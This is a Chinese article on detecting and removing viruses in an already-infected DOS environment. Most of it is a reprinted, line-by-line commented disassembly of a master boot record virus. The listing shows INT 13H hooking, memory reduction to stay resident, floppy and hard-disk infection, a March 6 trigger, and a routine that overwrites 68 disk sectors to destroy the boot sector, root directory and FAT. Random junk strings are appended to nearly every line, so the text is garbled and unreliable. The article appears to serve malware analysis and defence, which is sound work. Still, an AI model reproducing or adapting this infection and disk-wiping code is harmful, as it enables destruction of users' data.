近年来,新的计算机病毒发展十分猖獗,而且这些新病毒更加隐蔽 、复杂,某些新病毒所具有的破坏性更大,所带来的损失无法估量 。这表明计算机病毒的防治尤为重要,同时所面临的形势也更加严 峻 。本文就在带毒环境下检测清除病毒的方法问题提出一点体会与看法 。 WcE{1&PXx
?? ctqXzM `
?? 一 、 带毒环境下检测清除病毒的意义 _hK83s4
?? U2~7qC,!Do
?? 目前在我国流行的病毒一般可分为引导型病毒 、文件型病毒和混合型病毒 。引导型病毒的特点是它寄生在软盘的DOS引导扇区和硬盘的主引导记录或DOS引导区中 ,开机时由计算机自动读入内存中执行文件型病毒则将自身附加在可执行文件上 ,在执行被感染程序时,病毒首先获得控制权,进行驻留或破坏等活动。混合型病毒既能感染引导区也能感染可执行文件,具有更强的传染性。常用的杀毒软件有瑞星2004、金山毒霸、KV300 、公安部的KILL 、美国McAfee公司的SCAN和CLEAN等 ,这些软件各有自身的优点。但是在一个带毒的环境下,也即在病毒已经驻留在内存中的情况下,这些杀毒软件都存在不足并可能带来一些不良的后果。 '8 O(J7J
?? yDk|ad|
?? 当系统感染一种已知病毒时,KILL和SCAN 发现内存中有病毒后,一般是拒绝继续执行,并要求用干净的盘重新启动。KV300发现类似的警告信息,但提供给用户一个选择的机会,以确定是否继续执行, 很显然 ,若用户选择继续 ,所带来的后果是不可预期的。 ^##tk
?? lL6bIjf
?? 当系统感染一种未知病毒时,三种软件在未发现内存中有已知病毒后,都假设系统中无病毒,忠实地执行检测或清除功能。事实上,这个未知病毒可能会在检测时传染盘中所有的可执行文件。 u>e4;f`F
?? 7*D*nY4+
?? 由上面的讨论可知,清查病毒时只有从绝对干净的盘启动,而且要求杀毒软件自身无毒,才能够保证万无一失。然而,由于人们相互拷贝各种软件,很大程度上帮助了病毒的传播,在许多情况下, 要获得一张干净的启动盘很不容易,并且对于一些对计算机系统了解不是很多的使用者来说,他们根本 无法断定一张启动盘是不是干净的。因此,探讨在带毒环境下进行病毒检测和清除的方法是很有意义的 。 P8Nzz(JF
?? XnBpL6"T`
?? 二 、带毒环境下检测清除病毒的原理 Ry5/O?QL
?? }\p>h
?? 对于一个驻留内存伺机进行传染和破坏的病毒来说,一般都要截取某些中断向量,当其他程序调用这些中断时,病毒重新取得控制权,判断是否满足特定的条件,满足则激活传染或破坏部分,在条件不满足的情况下一般是调用原中断服务程序,实现正常的系统功能。 \Pv_5LAo
?? 引导型病毒常接管INT13H、08H、10H等中断;文件型病毒则常接管INT21H、24H、25H、26H、1CH 、13H、10H等中断。 ^7cZ9/3
Ws_RS%
@%8Xa7+
举一个例子: 该例子转自黑白网络"一个主引导区病毒的分析 作者:sinister " HkgmZw,
病毒体: IO, kGUS
JMP 01AF ;JMP到01AF Uwd^%x*
DB 00 ;病毒标计 =v(MdjwFl
DW 00F5 ;此为搬到高位址后,远程跳转指令 ^4D7sS;~3
DW 9F80 ;目的地,也就是跳下一个指令XOR AX,AX .'+*>y!
DB 02 @I`X{oAA
DW 0003 ;此为软盘识别标记,硬盘为0007 +@
'(N
DW EC59 ; _'g'M=E
DW F000 ;INT 13H的原入口 lP9XqQ(
. iymOq9
. JjH#,@'.
. |(mr&7O
. -]!m4xvK
. v7;zce/~
XOR AX,AX ;清除AX H*SEzVb
MOV DS,AX; ;让DS=0000 rkp 1tv
CLI ;清I标志积存器 bC[TLsh7{2
MOV SS,AX ;把堆栈设为0000:7C00也就是开机 'eKvt5&@
MOV AX,7C00 ;后载入引导分区表的地址,目前地址 vkQ81PEt
MOV SP,AX ;开机时为0000:7CB6 $-Ud&sjn
STI ;设I标志积存器 jQrj3b.NC3
PUSH DS ;把DS=0000,AX=7C00压栈,留给0B33:024A ^\Bm5QkS
PUSH AX ;用RETF,把程序转到引导或分区表位置 ]}K\&ho2
MOV AX,[004C] ;取中断向量表中,INT 13H的偏移位置 BseK?`]U"
MOV [7C0A],AX ;保存INT 13H的偏移位置,也就是存在 ]klP.&I/0
MOV AX,[004E] ;取INT 13H的段地址 uU&,KEH
MOV [7C0C],AX ;存到010C vXdz?
;以上是HOOK系统读写盘调用INT 13用病毒体替代原INT 13 T);eYC"@
;读写以便传播发作 pv:7kgod
V !Cu%4
MOV AX,[0413] ;取得内存K数,放在AX 8(.DI/
DEC AX ; ;=&D_jGf]
DEC AX ;减2k内存 TB=KTj
MOV [0413],AX ;存回,通常是638K )kMA_\$,
MOV CL,06 ; gnAM}
SHL AX,CL ; QFg,pTj
MOV ES,AX ;算出减2K后病毒本体的位址 m
6Xex.d
MOV [7C05],AX ;AX存入0105 !^o(?1
bp'qrcFuiL
;病毒常用手法将系统高段内存减少以便驻留 (WW*yv.J
;这样可以免于被其他程序覆盖 |7ga9
aY/msplC
MOV AX,000E ;病毒拦INT 13H {i:5XL
;ISR起始的偏移量 &}TfJ=gj
MOV [004C],AX ; k>W5ts2+
MOV [004E],ES ;设原为病毒的INT 13H \
2cI=Qf
MOV CX,01BE ;病毒长度为1BE $jLJ&R=?]
MOV SI,7C00 ;从JMP 01AF开始 M"q]jeaM
XOR DI,DI ;DI=0 =44hI86
CLD ;清方向标志 vcsrI8+
REPZ; xB&kxW.;
MOVSB ;CX=1BE,将病毒自身搬移到高位址,目地是使其引导或 FQV]/
CS: ;分区表能载入0000:7C00正常运作 Iyo ey
JMP FAR [7C03] ;跳到为搬过后的位址 &e#>%0aS
XOR AX,AX ;清AX <NIg`B@ 's
MOV ES,AX ;ES=0000 [dszz7/L
INT 13 ;复位磁盘 sd (I@
&y
PUSH CS ; -c^/k_n
POP DS ;让DS=CS # g.J,L
MOV AX,0201 ;用INT 13H读一扇区,是引导,或分区表则 P)7_RE*gY
MOV BX,7C00 ;读到0000:7C00 /F>\-
MOV CX,[0008] ;硬盘第0道,第7扇区 x~7_`=}rO
CMP CX,+07 ;比较是否从硬盘启动 -3YsrcJi
JNZ 0213 ;不是跳0213 |sM#nhxK
MOV DX,0080 ;第一硬盘C:第零面 amPC C
INT 13 ;用INT 13号中断,读 Gi<ik~
JMP 023E ;跳023E比较日期,发作或正常开机 6 (:^>@
MOV CX,[0008] ;软盘0道,第3扇区 X>i`z
MOV DX,0100 ;A:的第0面 Ch`nDIne
INT 13 ;INT 13读盘 (<u3<40[YN
JB 023E ;失败跳023E vV2px
PUSH CS aFI?^"L
POPES ;让ES=CS ,bv?c@
MOV AX,0201 ; 3
cd5g
MOV BX,0200 ; ##%R|P3
MOV CX,0001 ; R]oi&"H@r)
MOV DX,0080 ; "82<}D^;
INT 13 ;读入C:的分区表到0200,以便下面比较 wm3fd7T
JB 023E ;失败跳023E AR<'Airi:
XOR SI,SI ;清SI "IOu$?
CLD ;清方向标志以便比较 @J[l^o9
LODSW ;载入一个WORD到AX 'IaI7on
CMP AX,[BX] ;比较有无病毒存在..E9AC E8-8E2i,
JNZ 0287 ;没有则跳0287传染 /ae]v+
LODSW ;载入一个WORD到AX Ivw+U-Mz
CMP AX,[BX+02] ;再次确认..0000 $gYy3y
JNZ 0287 ;没有跳0287 qO5.NIs
XOR CX,CX ;清CX 1' #%UA
MOV AH,04 ; ELF,T(
INT 1A ;取得日期 !PCw-&
CMP DX,0306 ;是否为三月六日 =~Ac=j!q
JZ 024B ;是跳024B传染 <lk_]+ XJ3
RETF ;把程序交还给引导启动完成 "@xF(fyg
l:!4^>SC
步骤4:病毒INT 13代码分析 .Yxx
方法:U yPKDn.1
PUSH DS ;首先把要用到积存器 vt;<+"eps
PUSH AX ;入栈保存 a '/yN{?p
OR DL,DL ;比较是否为软盘 69Y>iPRU
JNZ 002F ;如不是则退出传染 dHU#Y,v
XOR AX,AX ;AX=0 x;RjLI 4h
MOV DS,AX ;数据代段=0 YF{ KSGq
TEST BYTE PTR [043F],01 ;比较是否为A盘 7=.}484>J
JNZ 002F ;不是则退出 /MS*_
POP AX ;将以上保存积存器 fo"dX4%}
POP DS ;弹栈恢复 u9AXiv+K
PUSHF ;压栈标志积存器 S9sFC!s1g
CS: ;以便执行原INT 13 R5QSf+/T4
CALL FAR [000A] ;执行原INT 13 l8n}&zX
PUSHF ;再次压栈 u8Ul +u
CALL 0036 ;以便跳转到传染程序 |?c
v5l7E
POPF ;跳转到执行传染 &} b'cO
RETF 0002 ;结束中断调用返回 !_+LmBd
G
POP AX ;恢复 d2w;d&2S
POP DS ;堆栈 AJRfl% 3
CS: ;跳转到原正常INT 13 (-\,t
JMP FAR [000A] ;地址执行 ~jd:3ip+!
Qp{rAAC:
;此段代码中展现了病毒常用手法,利用标志积存器做跳转 >+v)^7c
oa:GGW4Q
步骤5:传染过程分析 AT^?PD_
方法:U k~ZwHx(%S
对软盘传染过程: =2VM(GtK>
PUSH AX ;工 "%+C@>`(
PUSH BX ;作 'bP-pgc
PUSH CX ;寄 =1o_:VOG
PUSH DX ;存 )t
G`a ;
PUSH DS ;器 &`7tX.iMlh
PUSH ES ;入 (h0i2>K
PUSH SI ;栈 8aw'Q?
PUSH DI ;保存 JGaS`fKSk
PUSH CS ;以压/弹栈方式 Sr_]R<?
POP DS ;使数据段DS和 y8U |A0@$`
PUSH CS ;附加段ES均指向 IX eb6j8
POP ES ;代码段CS thk33ss:
MOV SI,0004 ;试4次 CtbmX)vE
MOV AX,0201 ;设置各 a;p3Me7
MOV BX,0200 ;积存器 LC5NB{b\%>
MOV CX,0001 ;为读软盘 HYgq@47$[
XOR DX,DX ;引导扇区做准备 A"S{W^iL
PUSHF ;压栈标志积存器 6MfjB@
CALL FAR [000A] ;正常的INT 13调用 .K(IRWuw
JNB 0063 ;成功则转判断 E<>Ev_5 >
XOR AX,AX ;不成功复位 d+KLtvB%M
PUSHF ;磁盘继续读 9C5w!_b@
CALL FAR [000A] ;如果4次 v&}mbt-
DEC SI ;均匀不成功 Pms"YhyZ7
JNZ 0045 ;则退出跳转 [((P,v*
JMP 00A6 ;退出传染 [`P+{ R
XOR SI,SI ;SI=0以便用 &Y"u*)bm
CLD ;LODSW读入软盘 XW6>;:4k
LODSW ;第1或第2字进行比较 D_,}lsrb
CMP AX,[BX] ;比较如果不包含病毒标志 -#v1b>ScY
JNZ 0071 ;则跳转写传染
=@b/Gl
LODSW ;如果已有标志 3_(fisvx
CMP AX,[BX+02] ;则退出 n!mtMPH$
JZ 00A6 ;传染子程序 be `\ O
MOV AX,0301 ;为写盘准备 uX@RdkC
MOV DH,01 ;如果是360K m(nGtrQJm
MOV CL,03 ;则写到1面0道3扇区 Q4Mp[
CMP BYTE PTR [BX+15],FD ;比较软盘 C=}YKsi|R|
JZ 0080 ;如果大于360K l]whL1N3
MOV CL,0E ;写到1面0道14扇区 kUAj Q>
MOV [0008],CX ;写病毒标志到软盘 2<Pi2s'
PUSHF ;调用原INT 13 vMJv.O>HW
CALL FAR [000A] ;进行传染 ^JF6L`Tp
JB 00A6 p=6Q0r|'
MOV SI,03BE ;以下是将正常 bit&H
MOV DI,01BE ;引导扇区从 //VgPl
MOV CX,0021 ;1BE起的21字节内容 +*[lp@zU{
CLD ;搬移到病毒程序尾部 lmb5Z-xB
REPZ ;开始复制 qp>O#tj[
MOVSW ev>gh0
MOV AX,0301 ;写盘功能调用,写一个扇区 1R)4[oYN\<
XOR BX,BX ;将病毒程序 j+Nun
MOV CX,0001 ;写入软盘引导扇区内 G S-@drZp_
XOR DX,DX ;设置为软盘 vX})6O
PUSHF I.I:2Ew+
CALL FAR [000A] ;执行正常INT 13调用写盘 oDul ?%
POP DI ;将 Klh7&HzR
POP SI ;工 m4(:H(Za
POP ES ;作 F+Og8^!
POP DS ;寄 +DS_'Tmr
POP DX ;存 epi{Ayb
POP CX ;器 $Jo[&,
POP BX ;退 `,~I*}T>5W
POP AX ;栈 _wp6rb:8!
RET ;返回调用处 D`3m%O(?
对硬盘传染过程: O-6848iCX
MOV CX,0007 ;第7扇区 >=c<6#:s<9
MOV [0008],CX ;此处为硬盘引导标记 <R>qOX8
MOV AX,301 ;写功能调用 ZLe@O~f;%
MOV DX,0080 ;设置为硬盘 wwVK15t
INT 13 ;将正常引导扇区写到0面0道7扇区内 ',nGH|K.
JB 13E ;失败则转 ;1}~(I#Y
MOV SI,03BE ;原分区表地址 Pq`]^^=be'
MOV DI,01BE ;目标地址 ^R\0<\'
MOV CX,0021 ;整个分区表 WlU^+ctS
REPNZ b Mi,z3z
MOVSW ;开始复制 v-2O{^n
;此段代码是将硬盘分区信息,搬移到病毒程序尾部 vMKmHq
;这样在分析着查看硬盘分区信息时仍能看到该部分 2'tZ9mK
;内容,以次来麻痹分析者 k'Fc:T8:~5
MOV AX,0301 ;准备写病毒提进硬盘 s%"3F<\
XOR BX,BX ;病毒体位置 #\1;d8h
INC CL ;第一扇区 oqOv"yLJ:
INT 13 ;开始写盘传染 |lAu6d
!
JMP 013E ;转到13E处判断是否为3月6日,是则发作 \;&9h1?Mn
A 1x?_S"a
步骤6:破坏过程分析 <*0^X%Vf\
方法:U ,tv
P"@d
主要分析对硬盘数据破坏: O=8:K'
.
.BJ;}
. ac6Lv}w_
. Y~( #_K
. U'@eUY(Ov$
. y
?]GOQI
MOV DL,80 8r(S=dA
MOV BYTE PTR[0007],04 c?5e| dZz
;准备写硬盘 L=ZKY
MOV AL,11 ;写17个扇区 K.G}*uy
MOV BX,5000 F`-|@k
MOV ES,BX ;从内存ES:5000中处开始写 cf?*6q?n
INT 13 ;残不人睹 ;1^_.3
JNB 0179 ;成功转179继续写 {tMpI\>S
XOR AH,AH w+gA3Dg
INT 13 ;不成功复位磁盘继续 Y s[J xP
INC DH ;使写操作磁头加1继续? K5No6dsD
CMP DH,[0007] ;比较是否小于0007单元值 =<j8)2
JB 0150 ;是则返回开始处继续写 Xu $_%+46
XOR DH,DH ;DH=0 fgYdKv8
INC CH ;再加扇区 '}4LHB;:
JMP 0150 ;反回继续写 @V:4tG.<sw
;以上操作实际上是对硬盘执行4次写操作,每次17个扇区 f.cIh ZF
;共68个扇区,这样就完全破坏了盘中的引导扇区,根目录 4Mi~eL%D
(
;和文件分配表。 tKgPKWP
vBAds
引导扇区病毒,俺手里没有,这是一段DOS BOOT的分析。BOOT区病毒和他完成同样的工作,只不过每次 7H~StdL/>
读盘的时将自身写入磁盘。 i]!CH2\
引导过程如下: `=^;q6f
1>调整堆栈位置 8?!=/Sc
2>修改并用修改后的磁盘参数表来复位磁盘系统 oUXu;@l
3>计算根目录表的首扇区的位置及IO.SYS的扇区位置 -Wc'k 2oU
4>读入根目录表的首扇区 AGkk|`
5>检查根目录表的开头两项是否为IO.SYS及MSDOS.SYS {-D2K:m
6>将IO.SYS文件开头三个扇区读入内存0000:0700H处 #jn6DL@[{
7>跳到0000:0700H处执行IO.SYS,引导完毕 Lw<?e;
003E FA CLI w?]k$
003F 33C0 XOR AX,AX 4.2qt
0041 8ED0 MOV SS,AX <<